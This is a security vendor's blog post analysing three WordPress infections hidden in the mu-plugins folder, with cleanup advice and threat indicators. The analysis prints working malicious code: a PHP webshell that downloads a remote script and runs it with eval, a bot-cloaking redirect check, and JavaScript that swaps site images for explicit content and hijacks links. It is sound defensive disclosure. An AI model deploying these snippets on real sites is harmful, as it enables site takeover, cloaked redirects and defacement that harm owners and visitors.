* [Security Advisory](https://blog.sucuri.net/category/security-advisory)* [Website Malware Infections](https://blog.sucuri.net/category/website-malware-infections)* [WordPress Security](https://blog.sucuri.net/category/wordpress-security)Hidden Malware Strikes Again: Mu-Plugins Under Attack===================================================== [Puja Srivastava](https://blog.sucuri.net/author/puja-srivastava)* March 28, 2025  At Sucuri, our security researchers continually monitor for new malware variants and infection techniques targeting WordPress websites. Recently, we’ve uncovered multiple cases where threat actors are leveraging the **mu-plugins** directory to hide malicious code. This approach represents a concerning trend, as the mu-plugins (Must-Use plugins) are not listed in the standard WordPress plugin interface, making them less noticeable and easier for users to ignore during routine security checks.What Was Discovered——————-Two different cases of malware emerged in the mu-plugins directory, both utilizing different methods to compromise WordPress sites:1. **Fake Update Redirect Malware:** Detected in the file `wp-content/mu-plugins/redirect.php`, this malware redirected site visitors to an external malicious website.2. **Webshell:** Found in `./wp-content/mu-plugins/index.php`, it allows attackers to execute arbitrary code, granting them near-complete control over the site.3. **A spam injector:** a spam injection script located in `wp-content/mu-plugins/custom-js-loader.php`. This script was being used to inject unwanted spam content onto the infected website, possibly to boost SEO rankings for malicious actors or promote scams.This builds upon our previous findings, as covered in our blog post on [hidden backdoors](https://blog.sucuri.net/2025/02/hidden-backdoors-uncovered-in-wordpress-malware-investigation.html), where similar issues were observed.### Indicators of Compromise (IoCs)The presence of this malware can be identified by most obvious signs. One prominent indicator is unusual behavior on the site, such as unauthorized redirections of users to external malicious websites. Additionally, suspicious files with uncommon or misleading names appear within the **mu-plugins** directory, often mimicking legitimate plugins. Website administrators may also notice elevated server resource usage with no clear explanation, along with unexpected file modifications or the inclusion of unauthorized code in critical directories.Scope of the Malware——————–The fact that we’ve seen so many infections inside mu-plugins suggests that attackers are actively targeting this directory as a persistent foothold. The mu-plugins directory is designed to automatically load plugins without requiring activation through the WordPress dashboard, making it an ideal hiding place for malware.These infections allow attackers to:* Redirect traffic to malicious websites.* Maintain persistent access via backdoors.* Inject spam content to manipulate SEO rankings.Analysis of the Malware — How and What Did It Do————————————————-### Case 1: Fake Update Redirection MalwareThe first malware sample we examined was disguised as a legitimate WordPress function within the **redirect.php** file. The script is structured to execute conditionally based on the user’s status, whether they are a bot, an administrator, or a regular visitor.A fake update malware on WordPress sites tricks users into running malicious code by disguising itself as a legitimate browser or system update. Once executed, it can inject backdoors, steal data, or install additional malware, compromising the site’s security.The script includes a function that identifies whether the current visitor is a bot. This allows the script to exclude search engine crawlers and prevent them from detecting the redirection behavior:“`function is_bot() { $bot_agents = [ ‘bot’, ‘crawl’, ‘spider’, ‘Googlebot’, ‘bingbot’, ‘Baiduspider’, ‘YandexBot’, ‘DuckDuckBot’, ‘Yahoo! Slurp’, ‘facebot’, ‘ia_archiver’, ‘AhrefsBot’, ‘SemrushBot’, ‘MJ12bot’, ‘DotBot’, ‘Sogou’, ‘Exabot’, ‘FacebookExternalHit’ ]; $user_agent = strtolower($_SERVER[‘HTTP_USER_AGENT’] ?? ”); foreach ($bot_agents as $bot) { if (strpos($user_agent, $bot) !== false) { return true; // User is a bot } } return false; // User is not a bot}“`The most concerning part of the script is the redirection mechanism to **updatesnow** -[**.** -]**net**. Bots and privileged users are skipped to avoid unwanted detection.### Case 2: Remote Code Execution Webshell**Webshell** — A [webshell](https://blog.sucuri.net/2024/04/web-shells.html) is a malicious script that hackers upload to a compromised website, giving them remote control over the server. It acts like a backdoor, allowing attackers to execute commands, upload files, steal data, or launch further attacks. Webshells are often disguised as normal files and hidden in website directories, making them hard to detect.The second case involves a more sophisticated attack disguised as a legitimate WordPress plugin. The malicious file (**./wp-content/mu-plugins/index.php**) contains a function that downloads and executes a remote PHP script.“`$externalResource = ‘https://raw.githubusercontent.com/starkvps99812/upd/refs/heads/main/BypassBest.php’;$connectionHandle = curl_init($externalResource);curl_setopt($connectionHandle, CURLOPT_RETURNTRANSFER, true);$retrievedCode = curl_exec($connectionHandle);if (curl_errno($connectionHandle)) { die(‘cURL error occurred: ‘ . curl_error($connectionHandle));}curl_close($connectionHandle);eval(‘?>’ . $retrievedCode);“`Since the external script can change at any time, the attacker can dynamically inject new malware without modifying the plugin itself.Case 3: Spam Content and Link Hijacking Injector————————————————The third variant uses JavaScript injection. At the beginning, the script enables error reporting and WordPress debugging.“`error_reporting(E_ALL);ini_set(‘display_errors’, 1);define(‘WP_DEBUG’, true);define(‘WP_DEBUG_LOG’, true);define(‘WP_DEBUG_DISPLAY’, true);“`Then the malware targets the MU-Plugins folder, ensuring its existence:“`$mu_plugins_dir = ‘/home/h34vwyurk8sp/public_html/wp-content/mu-plugins/’;$plugin_file = $mu_plugins_dir . ‘custom-js-loader.php’;if (!is_dir($mu_plugins_dir)) { mkdir($mu_plugins_dir, 0755, true);}“`The script writes a custom JavaScript injector that replaces images and manipulates links. It replaces all images on the site with explicit content, potentially harming the website’s reputation.“`document.addEventListener(‘DOMContentLoaded’, function () { let newUrl = ‘https://imagex1[.]sx[.]cdn[.]live/images/pinporn/2022/02/23/26777510.gif?width=620’; document.querySelectorAll(‘img’).forEach(link => { link.src = newUrl; link.srcset = newUrl; });});“`Another malicious section intercepts link clicks. It hijacks all outbound links, opening a malicious popup instead of directing users to their intended destination.“`document.addEventListener(‘DOMContentLoaded’, function () { document.querySelectorAll(‘a’).forEach(link => { link.addEventListener(‘click’, function (event) { event.preventDefault(); let url = this.href; let popupUrl = ‘https://imagex1[.]sx[.]cdn[.]live/images/pinporn/2023/01/26/28785006.gif?width=620’; if (!url.includes(window.location.hostname)) { window.open(popupUrl, ‘PopupWindow’, ‘width=800,height=600,resizable=yes,scrollbars=yes’); } else { window.location.href = url; } }); });});“`Here is how the site looked with all the images replaced by explicit images:Motive Behind the Attack and Impact of the Malware————————————————–The ultimate goal behind these infections appears to be a mix of monetization and persistence. Each of these techniques benefits the attacker financially while keeping their payload hidden.The redirect malware exposes users to potentially harmful content, leading to potential malware downloads and damage to the website’s reputation, and a drop in traffic. The webshell poses a much greater threat, as it can lead to complete website takeover, data theft, malware distribution, website defacement, SEO spam, and the establishment of a persistent backdoor for future attacks. The spam content injection malware, in the third case, severely damages the site’s reputation by replacing all images with sexually explicit content, and redirecting all external links, likely to malicious or spam websites. The potential impact ranges from minor inconveniences to severe security breaches, highlighting the importance of proactive website security measures.How Could the Site Have Been Infected?————————————–There are multiple ways this malware might have entered the affected WordPress sites:* **Exploiting vulnerable plugins or themes** — If a website is running outdated software, attackers could exploit known vulnerabilities to upload malicious files.* **Compromised admin credentials** — If an attacker gains access to an administrator account, they can manually place malware inside mu-plugins.* **Abuse of poorly secured hosting environments** — Weak file permissions or outdated server configurations can allow attackers to modify WordPress core files.Once inside the mu-plugins directory, the malware ensures it loads automatically with WordPress, making detection and removal harder.Prevention and Mitigation————————-If you suspect your site is infected, take immediate action:* Scan your WordPress installation for malicious files, especially in the mu-plugins directory.* Check for unauthorized administrator accounts and remove any that seem suspicious.* Audit your installed plugins and delete any that look unfamiliar.* Update WordPress, plugins, and themes to the latest versions to prevent reinfection.* Change all admin passwords and enable two-factor authentication (2FA) for added security.* Monitor file integrity by setting up a security plugin that alerts you to unexpected changes.Conclusion———-The repeated abuse of the **mu-plugins** directory highlights the creativity and persistence of attackers in hiding malware deep within WordPress installations.Regular security monitoring, file integrity checks, and web application firewalls (WAFs) are essential in keeping such infections at bay.If you’re unsure whether your site has been compromised, Sucuri’s [website security platform](https://sucuri.net/website-security-platform/) can help detect and remove hidden threats before they cause damage.  ##### [Puja Srivastava](https://blog.sucuri.net/author/puja-srivastava)Puja Srivastava is a Security Analyst with a passion for fighting new and undetected malware threats. With over 7 years of experience in the field of malware research and security, Puja has honed her skills in detecting, monitoring, and cleaning malware from websites. Her responsibilities include website malware remediation, training, cross-training and mentoring new recruits and analysts from other departments, and handling escalations. Outside of work, Puja enjoys exploring new places and cuisines, experimenting with new recipes in the kitchen, and playing chess.##### Related Tags* [Malware](https://blog.sucuri.net/tag/malware),* [Website Backdoor](https://blog.sucuri.net/tag/website-backdoor),* [WordPress Plugins and Themes](https://blog.sucuri.net/tag/wordpress-plugins-and-themes),* [WordPress Security](https://blog.sucuri.net/tag/wordpress-security)##### Related Categories* [Security Advisory](https://blog.sucuri.net/category/security-advisory)* [Website Malware Infections](https://blog.sucuri.net/category/website-malware-infections)* [WordPress Security](https://blog.sucuri.net/category/wordpress-security) * [Security Education](https://blog.sucuri.net/category/security-education)* [Sucuri Labs](https://blog.sucuri.net/category/sucuri-labs)* [Website Malware Infections](https://blog.sucuri.net/category/website-malware-infections)* [Website Security](https://blog.sucuri.net/category/website-security)[](https://blog.sucuri.net/2020/08/string-concatenation-obfuscation-techniques.html) [String Concatenation: Obfuscation Techniques](https://blog.sucuri.net/2020/08/string-concatenation-obfuscation-techniques.html)——————————————————————————————————————————–* Krasimir Konov* August 12, 2020 While string concatenation has many valuable applications in development — such as making code more efficient or functions more effective — it is also a… [Read the Post](https://blog.sucuri.net/2020/08/string-concatenation-obfuscation-techniques.html)  * [Magento Security](https://blog.sucuri.net/category/magento-security)* [Sucuri Labs](https://blog.sucuri.net/category/sucuri-labs)* [Website Malware Infections](https://blog.sucuri.net/category/website-malware-infections)* [Website Security](https://blog.sucuri.net/category/website-security)[](https://blog.sucuri.net/2020/07/skimmers-in-images-github-repos.html) [Skimmers in Images -& GitHub Repos](https://blog.sucuri.net/2020/07/skimmers-in-images-github-repos.html)———————————————————————————————————-* Denis Sinegubko* July 22, 2020 MalwareBytes recently shared some information about web skimmers that store malicious code inside real .ico files. During a routine investigation, we detected a similar issue…. [Read the Post](https://blog.sucuri.net/2020/07/skimmers-in-images-github-repos.html)  * [WordPress Security](https://blog.sucuri.net/category/wordpress-security)[](https://blog.sucuri.net/2016/05/nulled-wordpress-themes-malvertising-black-hat-seo.html) [Nulled WordPress Themes: Malvertising and Black Hat SEO](https://blog.sucuri.net/2016/05/nulled-wordpress-themes-malvertising-black-hat-seo.html)————————————————————————————————————————————————–* Denis Sinegubko* May 24, 2016 If you have been following our blog for some time, you know that we regularly warn about risks associated with the use of third-party software on… [Read the Post](https://blog.sucuri.net/2016/05/nulled-wordpress-themes-malvertising-black-hat-seo.html)  * [Website Malware Infections](https://blog.sucuri.net/category/website-malware-infections)* [Website Security](https://blog.sucuri.net/category/website-security)* [WordPress Security](https://blog.sucuri.net/category/wordpress-security)[](https://blog.sucuri.net/2022/04/wordpress-popunder-malware-redirects-to-scam-sites.html) [WordPress Popunder Malware Redirects to Scam Sites](https://blog.sucuri.net/2022/04/wordpress-popunder-malware-redirects-to-scam-sites.html)———————————————————————————————————————————————* Ben Martin* April 1, 2022 Over the last year we’ve seen an ongoing malware infection which redirects website visitors to scam sites. So far this year our monitoring has detected… [Read the Post](https://blog.sucuri.net/2022/04/wordpress-popunder-malware-redirects-to-scam-sites.html)  * [Ecommerce Security](https://blog.sucuri.net/category/ecommerce-security)* [Magento Security](https://blog.sucuri.net/category/magento-security)* [Website Malware Infections](https://blog.sucuri.net/category/website-malware-infections)* [Website Security](https://blog.sucuri.net/category/website-security)[](https://blog.sucuri.net/2021/06/credit-card-theft-types-of-swipers.html) [Online Credit Card Theft — A Brief Overview of Online Fraud and Abuse — Part 2](https://blog.sucuri.net/2021/06/credit-card-theft-types-of-swipers.html)———————————————————————————————————————————————————–* Ben Martin* June 30, 2021 In my previous post about ecommerce credit card swipers I described the general overview of the online ecommerce environment as well as some of the… [Read the Post](https://blog.sucuri.net/2021/06/credit-card-theft-types-of-swipers.html)  * [Security Education](https://blog.sucuri.net/category/security-education)* [Sucuri Labs](https://blog.sucuri.net/category/sucuri-labs)* [Vulnerability Disclosure](https://blog.sucuri.net/category/vulnerability-disclosure)* [Website Malware Infections](https://blog.sucuri.net/category/website-malware-infections)[](https://blog.sucuri.net/2020/05/vulnerabilities-digest-may-2020.html) [Vulnerabilities Digest: May 2020](https://blog.sucuri.net/2020/05/vulnerabilities-digest-may-2020.html)——————————————————————————————————–* John Castro* May 29, 2020 Relevant Plugins and Vulnerabilities: Plugin Vulnerability Patched Version Installs WP Product Review Unauthenticated Stored XSS 3.7.6 40000 Form Maker by 10Web Authenticated SQL Injection —… [Read the Post](https://blog.sucuri.net/2020/05/vulnerabilities-digest-may-2020.html)  * [Security Advisory](https://blog.sucuri.net/category/security-advisory)* [Vulnerability Disclosure](https://blog.sucuri.net/category/vulnerability-disclosure)* [WordPress Security](https://blog.sucuri.net/category/wordpress-security)[](https://blog.sucuri.net/2023/02/wordpress-vulnerability-patch-roundup-february-2023.html) [WordPress Vulnerability -& Patch Roundup February 2023](https://blog.sucuri.net/2023/02/wordpress-vulnerability-patch-roundup-february-2023.html)————————————————————————————————————————————————–* Cesar Anjos* February 27, 2023 Vulnerability reports and responsible disclosures are essential for website security awareness and education. Automated attacks targeting known software vulnerabilities are one of the leading causes… [Read the Post](https://blog.sucuri.net/2023/02/wordpress-vulnerability-patch-roundup-february-2023.html)  * [Website Malware Infections](https://blog.sucuri.net/category/website-malware-infections)* [WordPress Security](https://blog.sucuri.net/category/wordpress-security)[](https://blog.sucuri.net/2023/02/konami-code-backdoor-concealed-in-image.html) [Konami Code Backdoor Concealed in Image](https://blog.sucuri.net/2023/02/konami-code-backdoor-concealed-in-image.html)———————————————————————————————————————–* Ben Martin* February 2, 2023 Attackers are always looking for new ways to conceal their malware and evade detection, whether it’s through new forms of obfuscation, concatenation, or — in… [Read the Post](https://blog.sucuri.net/2023/02/konami-code-backdoor-concealed-in-image.html)  * [Sucuri Labs](https://blog.sucuri.net/category/sucuri-labs)* [Website Malware Infections](https://blog.sucuri.net/category/website-malware-infections)* [Website Security](https://blog.sucuri.net/category/website-security)[](https://blog.sucuri.net/2017/08/javascript-used-to-generate-malicious-documents.html) [JavaScript Used to Generate Malicious Documents](https://blog.sucuri.net/2017/08/javascript-used-to-generate-malicious-documents.html)—————————————————————————————————————————————* Krasimir Konov* August 17, 2017 When talking about compromised environments, we often think that the website itself is the end goal but that’s not always true. In some cases, attackers… [Read the Post](https://blog.sucuri.net/2017/08/javascript-used-to-generate-malicious-documents.html)  * [Website Malware Infections](https://blog.sucuri.net/category/website-malware-infections)* [WordPress Security](https://blog.sucuri.net/category/wordpress-security)[](https://blog.sucuri.net/2018/01/malicious-cryptominers-from-github-part-2.html) [Malicious Website Cryptominers from GitHub. Part 2.](https://blog.sucuri.net/2018/01/malicious-cryptominers-from-github-part-2.html)————————————————————————————————————————————-* Denis Sinegubko* January 3, 2018 Recently we wrote about how GitHub/GitHub.io was used in attacks that injected cryptocurrency miners into compromised websites. Around the same time, we noticed another attack… [Read the Post](https://blog.sucuri.net/2018/01/malicious-cryptominers-from-github-part-2.html)
Related Tags:
NAICS: 518 – Computing Infrastructure Providers
Data Processing
Web Hosting
Related Services
NAICS: 51 – Information
Denis
Blog: Sucuri
TA0003 – Persistence
Server Software Component: Web Shell
Server Software Component
Defacement
User Execution: Malicious File
Associated Indicators:
https://imagex1.sx.cdn.live/images/pinporn/2023/01/26/28785006.gif?width=620
https://imagex1.sx.cdn.live/images/pinporn/2022/02/23/26777510.gif?width=620
imagex1.sx.cdn.live
updatesnow.net